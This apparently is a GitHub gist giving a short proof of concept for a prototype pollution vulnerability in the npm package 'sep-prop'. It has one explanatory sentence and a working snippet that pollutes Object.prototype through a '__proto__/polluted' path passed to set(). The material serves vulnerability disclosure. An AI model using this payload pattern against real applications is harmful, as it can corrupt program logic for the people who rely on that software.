miguelafmonteiro/sep-prop_poc.js

Created July 18, 2023 10:11

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/miguelafmonteiro/3a172c75a582e28eb43b593b923b2b2e.js"></script>
Save miguelafmonteiro/3a172c75a582e28eb43b593b923b2b2e to your computer and use it in GitHub Desktop.

Download ZIP

Affected versions of this package are vulnerable to Prototype Pollution. The function set() (index.js#67) adds in the target object a nested property specified in the path without checking the provided keys for sensitive properties like __proto__.

Raw

sep-prop_poc.js

	const sep = require('sep-prop');

	console.log({}.polluted);
	sep.set({}, "__proto__/polluted", "Polluted!");
	console.log({}.polluted);

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment